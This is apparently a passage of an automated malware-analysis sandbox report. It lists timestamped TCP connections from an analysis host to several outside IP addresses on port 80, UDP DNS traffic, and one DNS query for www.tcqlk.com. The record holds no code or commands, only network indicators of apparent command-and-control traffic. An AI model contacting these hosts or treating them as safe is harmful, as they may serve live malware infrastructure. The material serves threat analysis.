                                              Jul 1, 2024 16:17:48.596720934 CEST4975480192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:48.596831083 CEST4975480192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:48.599519014 CEST4975480192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:48.604666948 CEST8049754192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:54.086344957 CEST4975580192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:54.091176033 CEST8049755199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:54.092051029 CEST4975580192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:54.095976114 CEST4975580192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:54.100742102 CEST8049755199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:54.566551924 CEST8049755199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:54.566566944 CEST8049755199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:54.566576958 CEST8049755199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:54.566713095 CEST4975580192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:55.610253096 CEST4975580192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:56.631984949 CEST4975680192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:56.637126923 CEST8049756199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:56.638112068 CEST4975680192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:56.643054008 CEST4975680192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:56.647942066 CEST8049756199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:57.103627920 CEST8049756199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:57.103652954 CEST8049756199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:57.103703976 CEST4975680192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:57.103719950 CEST8049756199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:57.103765965 CEST4975680192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:58.141344070 CEST4975680192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:59.161892891 CEST4975780192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:59.166946888 CEST8049757199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:59.167028904 CEST4975780192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:59.170070887 CEST4975780192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:59.175156116 CEST8049757199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:59.175291061 CEST8049757199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:59.644108057 CEST8049757199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:59.644196987 CEST8049757199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:59.644232988 CEST8049757199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:59.644268036 CEST4975780192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:59.644305944 CEST4975780192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:18:00.672576904 CEST4975780192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:18:01.692975044 CEST4975880192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:18:01.699569941 CEST8049758199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:18:01.699639082 CEST4975880192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:18:01.702274084 CEST4975880192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:18:01.709466934 CEST8049758199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:18:02.193284035 CEST8049758199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:18:02.193368912 CEST8049758199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:18:02.193377018 CEST8049758199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:18:02.193986893 CEST4975880192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:18:02.198219061 CEST4975880192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:18:02.203052044 CEST8049758199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:18:07.339035034 CEST4975980192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:07.343945980 CEST804975945.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:07.344031096 CEST4975980192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:07.346514940 CEST4975980192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:07.351342916 CEST804975945.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:08.266159058 CEST804975945.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:08.266400099 CEST804975945.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:08.266525030 CEST4975980192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:08.860071898 CEST4975980192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:09.879092932 CEST4976080192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:09.884064913 CEST804976045.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:09.884154081 CEST4976080192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:09.886069059 CEST4976080192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:09.890916109 CEST804976045.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:10.806495905 CEST804976045.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:10.806607962 CEST804976045.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:10.808104992 CEST4976080192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:11.391294003 CEST4976080192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:12.410413027 CEST4976180192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:12.415347099 CEST804976145.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:12.415458918 CEST4976180192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:12.417527914 CEST4976180192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:12.422604084 CEST804976145.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:12.422661066 CEST804976145.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:13.333486080 CEST804976145.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:13.333591938 CEST804976145.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:13.333646059 CEST4976180192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:13.922626019 CEST4976180192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:14.941421986 CEST4976280192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:14.946348906 CEST804976245.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:14.946831942 CEST4976280192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:14.951992989 CEST4976280192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:14.956815004 CEST804976245.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:15.845623016 CEST804976245.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:15.845684052 CEST804976245.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:15.845978975 CEST4976280192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:15.848808050 CEST4976280192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:15.853596926 CEST804976245.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:21.021303892 CEST4976380192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:21.026185036 CEST804976381.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:21.026278019 CEST4976380192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:21.028650999 CEST4976380192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:21.033495903 CEST804976381.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:21.713047981 CEST804976381.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:21.713067055 CEST804976381.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:21.713078976 CEST804976381.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:21.713089943 CEST804976381.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:21.713099003 CEST804976381.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:21.713109970 CEST804976381.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:21.713129044 CEST4976380192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:21.713252068 CEST4976380192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:22.531989098 CEST4976380192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:23.551806927 CEST4976480192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:23.556699038 CEST804976481.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:23.556778908 CEST4976480192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:23.559108973 CEST4976480192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:23.563922882 CEST804976481.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:24.248047113 CEST804976481.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:24.248069048 CEST804976481.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:24.248081923 CEST804976481.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:24.248126984 CEST804976481.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:24.248162985 CEST4976480192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:24.248225927 CEST4976480192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:24.248239040 CEST804976481.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:24.248353004 CEST804976481.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:24.252038002 CEST4976480192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:25.063317060 CEST4976480192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:26.081911087 CEST4976580192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:26.086894035 CEST804976581.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:26.088108063 CEST4976580192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:26.091989994 CEST4976580192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:26.096746922 CEST804976581.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:26.096880913 CEST804976581.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:26.795411110 CEST804976581.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:26.795455933 CEST804976581.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:26.795474052 CEST804976581.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:26.795552015 CEST4976580192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:26.795705080 CEST804976581.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:26.795865059 CEST4976580192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:26.795875072 CEST804976581.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:26.796101093 CEST804976581.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:26.800085068 CEST4976580192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:27.594381094 CEST4976580192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:28.622030020 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:28.627051115 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:28.632405043 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:28.632405043 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:28.637330055 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.343560934 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.343588114 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.343597889 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.343655109 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.343667030 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.343678951 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.343732119 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:29.343794107 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:29.343893051 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.343904972 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.343916893 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.343928099 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.343945026 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:29.343970060 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:29.348726034 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.348788977 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.348877907 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:29.349188089 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.391191959 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:29.442713976 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.455950975 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.455985069 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.455997944 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.456008911 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.456023932 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.456041098 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:29.456063986 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:29.456147909 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:29.456381083 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.456393957 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.456408024 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.456444025 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:29.456757069 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:29.456809044 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:29.468863010 CEST4976680192.168.2.581.95.96.29
                                              Jul 1, 2024 16:18:29.473695040 CEST804976681.95.96.29192.168.2.5
                                              Jul 1, 2024 16:18:35.359211922 CEST4976780192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:35.364118099 CEST8049767103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:35.364186049 CEST4976780192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:35.366411924 CEST4976780192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:35.371332884 CEST8049767103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:35.999718904 CEST8049767103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:36.000441074 CEST8049767103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:36.000507116 CEST4976780192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:36.875641108 CEST4976780192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:37.894439936 CEST4976880192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:37.899331093 CEST8049768103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:37.899425983 CEST4976880192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:37.901422977 CEST4976880192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:37.906630039 CEST8049768103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:38.533639908 CEST8049768103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:38.534405947 CEST8049768103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:38.536072969 CEST4976880192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:39.408171892 CEST4976880192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:40.456446886 CEST4976980192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:40.463553905 CEST8049769103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:40.466773987 CEST4976980192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:40.486275911 CEST4976980192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:40.491156101 CEST8049769103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:40.492057085 CEST8049769103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:41.086306095 CEST8049769103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:41.086344004 CEST8049769103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:41.086400986 CEST4976980192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:42.000694036 CEST4976980192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:43.027993917 CEST4977080192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:43.032840967 CEST8049770103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:43.036092043 CEST4977080192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:43.039994001 CEST4977080192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:43.045306921 CEST8049770103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:43.638958931 CEST8049770103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:43.639575958 CEST8049770103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:43.639673948 CEST4977080192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:43.641834974 CEST4977080192.168.2.5103.224.182.246
                                              Jul 1, 2024 16:18:43.647058010 CEST8049770103.224.182.246192.168.2.5
                                              Jul 1, 2024 16:18:48.825427055 CEST4977180192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:48.830413103 CEST804977172.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:48.832214117 CEST4977180192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:48.836009979 CEST4977180192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:48.843064070 CEST804977172.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:49.369935036 CEST804977172.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:49.369998932 CEST4977180192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:50.344419003 CEST4977180192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:50.349920034 CEST804977172.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:51.364438057 CEST4977280192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:51.370407104 CEST804977272.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:51.370474100 CEST4977280192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:51.373471022 CEST4977280192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:51.381607056 CEST804977272.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:51.936453104 CEST804977272.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:51.936502934 CEST4977280192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:52.878485918 CEST4977280192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:52.883471966 CEST804977272.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:53.894709110 CEST4977380192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:53.899771929 CEST804977372.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:53.899858952 CEST4977380192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:53.901906013 CEST4977380192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:53.911834955 CEST804977372.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:53.911856890 CEST804977372.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:54.426141977 CEST804977372.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:54.426392078 CEST4977380192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:55.406965971 CEST4977380192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:55.411771059 CEST804977372.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:56.428102970 CEST4977480192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:56.433803082 CEST804977472.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:56.437958002 CEST4977480192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:56.437958002 CEST4977480192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:56.443196058 CEST804977472.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:57.446877956 CEST804977472.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:57.448077917 CEST804977472.52.179.174192.168.2.5
                                              Jul 1, 2024 16:18:57.448124886 CEST4977480192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:57.450500011 CEST4977480192.168.2.572.52.179.174
                                              Jul 1, 2024 16:18:57.455388069 CEST804977472.52.179.174192.168.2.5
                                              Jul 1, 2024 16:19:02.630013943 CEST4977580192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:02.634804964 CEST8049775192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:02.634902000 CEST4977580192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:02.638027906 CEST4977580192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:02.643137932 CEST8049775192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:03.131706953 CEST8049775192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:03.132463932 CEST8049775192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:03.132512093 CEST4977580192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:04.144010067 CEST4977580192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:05.161272049 CEST4977680192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:05.497896910 CEST8049776192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:05.498038054 CEST4977680192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:05.500678062 CEST4977680192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:05.506140947 CEST8049776192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:06.005846977 CEST8049776192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:06.005875111 CEST8049776192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:06.006022930 CEST4977680192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:07.016504049 CEST4977680192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:08.035641909 CEST4977780192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:08.040510893 CEST8049777192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:08.040627956 CEST4977780192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:08.042437077 CEST4977780192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:08.047296047 CEST8049777192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:08.047954082 CEST8049777192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:08.534682035 CEST8049777192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:08.578823090 CEST4977780192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:08.880693913 CEST8049777192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:08.881162882 CEST8049777192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:08.881989956 CEST8049777192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:08.882057905 CEST4977780192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:08.882057905 CEST4977780192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:09.547575951 CEST4977780192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:10.572010040 CEST4977880192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:10.578949928 CEST8049778192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:10.584171057 CEST4977880192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:10.587030888 CEST4977880192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:10.591998100 CEST8049778192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:11.085134029 CEST8049778192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:11.085227966 CEST8049778192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:11.086469889 CEST4977880192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:11.090166092 CEST4977880192.168.2.5192.227.175.142
                                              Jul 1, 2024 16:19:11.094984055 CEST8049778192.227.175.142192.168.2.5
                                              Jul 1, 2024 16:19:16.242743015 CEST4977980192.168.2.531.186.11.254
                                              Jul 1, 2024 16:19:16.247612000 CEST804977931.186.11.254192.168.2.5
                                              Jul 1, 2024 16:19:16.248162031 CEST4977980192.168.2.531.186.11.254
                                              Jul 1, 2024 16:19:16.252042055 CEST4977980192.168.2.531.186.11.254
                                              Jul 1, 2024 16:19:16.256925106 CEST804977931.186.11.254192.168.2.5
                                              Jul 1, 2024 16:19:17.766280890 CEST4977980192.168.2.531.186.11.254
                                              Jul 1, 2024 16:19:17.813339949 CEST804977931.186.11.254192.168.2.5
                                              Jul 1, 2024 16:19:18.785062075 CEST4978080192.168.2.531.186.11.254
                                              Jul 1, 2024 16:19:18.866251945 CEST804978031.186.11.254192.168.2.5
                                              Jul 1, 2024 16:19:18.866357088 CEST4978080192.168.2.531.186.11.254
                                              Jul 1, 2024 16:19:18.868393898 CEST4978080192.168.2.531.186.11.254
                                              Jul 1, 2024 16:19:18.873166084 CEST804978031.186.11.254192.168.2.5
                                              Jul 1, 2024 16:19:20.375623941 CEST4978080192.168.2.531.186.11.254
                                              Jul 1, 2024 16:19:20.421263933 CEST804978031.186.11.254192.168.2.5
                                              Jul 1, 2024 16:19:21.863240957 CEST4978180192.168.2.531.186.11.254
                                              Jul 1, 2024 16:19:21.869009018 CEST804978131.186.11.254192.168.2.5
                                              Jul 1, 2024 16:19:21.869102001 CEST4978180192.168.2.531.186.11.254
                                              Jul 1, 2024 16:19:21.871066093 CEST4978180192.168.2.531.186.11.254
                                              Jul 1, 2024 16:19:21.876116991 CEST804978131.186.11.254192.168.2.5
                                              Jul 1, 2024 16:19:21.876874924 CEST804978131.186.11.254192.168.2.5

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 1, 2024 16:15:47.669209957 CEST6378253192.168.2.51.1.1.1
                                              Jul 1, 2024 16:15:48.657237053 CEST6378253192.168.2.51.1.1.1
                                              Jul 1, 2024 16:15:49.657185078 CEST6378253192.168.2.51.1.1.1
                                              Jul 1, 2024 16:15:49.793623924 CEST53637821.1.1.1192.168.2.5
                                              Jul 1, 2024 16:15:49.793638945 CEST53637821.1.1.1192.168.2.5
                                              Jul 1, 2024 16:15:49.793643951 CEST53637821.1.1.1192.168.2.5
                                              Jul 1, 2024 16:16:11.176532984 CEST6096353192.168.2.51.1.1.1
                                              Jul 1, 2024 16:16:11.201498032 CEST53609631.1.1.1192.168.2.5
                                              Jul 1, 2024 16:16:24.412322044 CEST5653353192.168.2.51.1.1.1
                                              Jul 1, 2024 16:16:24.956625938 CEST53565331.1.1.1192.168.2.5
                                              Jul 1, 2024 16:16:58.990914106 CEST6048853192.168.2.51.1.1.1
                                              Jul 1, 2024 16:16:59.545833111 CEST53604881.1.1.1192.168.2.5
                                              Jul 1, 2024 16:17:13.286879063 CEST6028653192.168.2.51.1.1.1
                                              Jul 1, 2024 16:17:13.314390898 CEST53602861.1.1.1192.168.2.5
                                              Jul 1, 2024 16:17:26.543052912 CEST6326453192.168.2.51.1.1.1
                                              Jul 1, 2024 16:17:26.694176912 CEST53632641.1.1.1192.168.2.5
                                              Jul 1, 2024 16:17:39.896023989 CEST5075253192.168.2.51.1.1.1
                                              Jul 1, 2024 16:17:40.349975109 CEST53507521.1.1.1192.168.2.5
                                              Jul 1, 2024 16:17:53.615484953 CEST5526553192.168.2.51.1.1.1
                                              Jul 1, 2024 16:17:54.083499908 CEST53552651.1.1.1192.168.2.5
                                              Jul 1, 2024 16:18:07.208587885 CEST5522753192.168.2.51.1.1.1
                                              Jul 1, 2024 16:18:07.336246014 CEST53552271.1.1.1192.168.2.5
                                              Jul 1, 2024 16:18:20.867989063 CEST5545253192.168.2.51.1.1.1
                                              Jul 1, 2024 16:18:21.018225908 CEST53554521.1.1.1192.168.2.5
                                              Jul 1, 2024 16:18:34.474514961 CEST6035953192.168.2.51.1.1.1
                                              Jul 1, 2024 16:18:35.356607914 CEST53603591.1.1.1192.168.2.5
                                              Jul 1, 2024 16:18:48.664015055 CEST5438053192.168.2.51.1.1.1
                                              Jul 1, 2024 16:18:48.822694063 CEST53543801.1.1.1192.168.2.5
                                              Jul 1, 2024 16:19:02.457811117 CEST5073053192.168.2.51.1.1.1
                                              Jul 1, 2024 16:19:02.626677036 CEST53507301.1.1.1192.168.2.5
                                              Jul 1, 2024 16:19:16.099555016 CEST5491153192.168.2.51.1.1.1
                                              Jul 1, 2024 16:19:16.237375975 CEST53549111.1.1.1192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jul 1, 2024 16:15:47.669209957 CEST192.168.2.51.1.1.10x95a4Standard query (0)www.tcqlk.comA (IP address)IN (0x0001)false
